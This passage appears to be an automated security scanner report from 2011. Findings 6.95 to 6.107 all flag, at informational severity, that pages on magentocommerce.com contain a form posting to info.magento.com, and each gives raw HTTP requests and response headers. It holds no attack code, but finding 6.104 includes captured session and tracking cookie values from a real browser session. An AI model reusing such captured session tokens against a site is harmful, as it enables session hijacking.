The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176174; expires=Sat, 11-Aug-2012 15:09:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:34 GMT
Content-Length: 34173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.95. http://www.magentocommerce.com/media/screencasts/static-blocks/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/static-blocks/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176010; expires=Sat, 11-Aug-2012 15:06:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:51 GMT
Content-Length: 34297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.96. http://www.magentocommerce.com/media/screencasts/transactional-email/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/transactional-email/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176037; expires=Sat, 11-Aug-2012 15:07:17 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:18 GMT
Content-Length: 34426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.97. http://www.magentocommerce.com/media/screencasts/upsells/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/upsells/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176165; expires=Sat, 11-Aug-2012 15:09:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.98. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.99. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.100. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.101. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.102. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.103. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.104. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.105. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.106. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.107. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
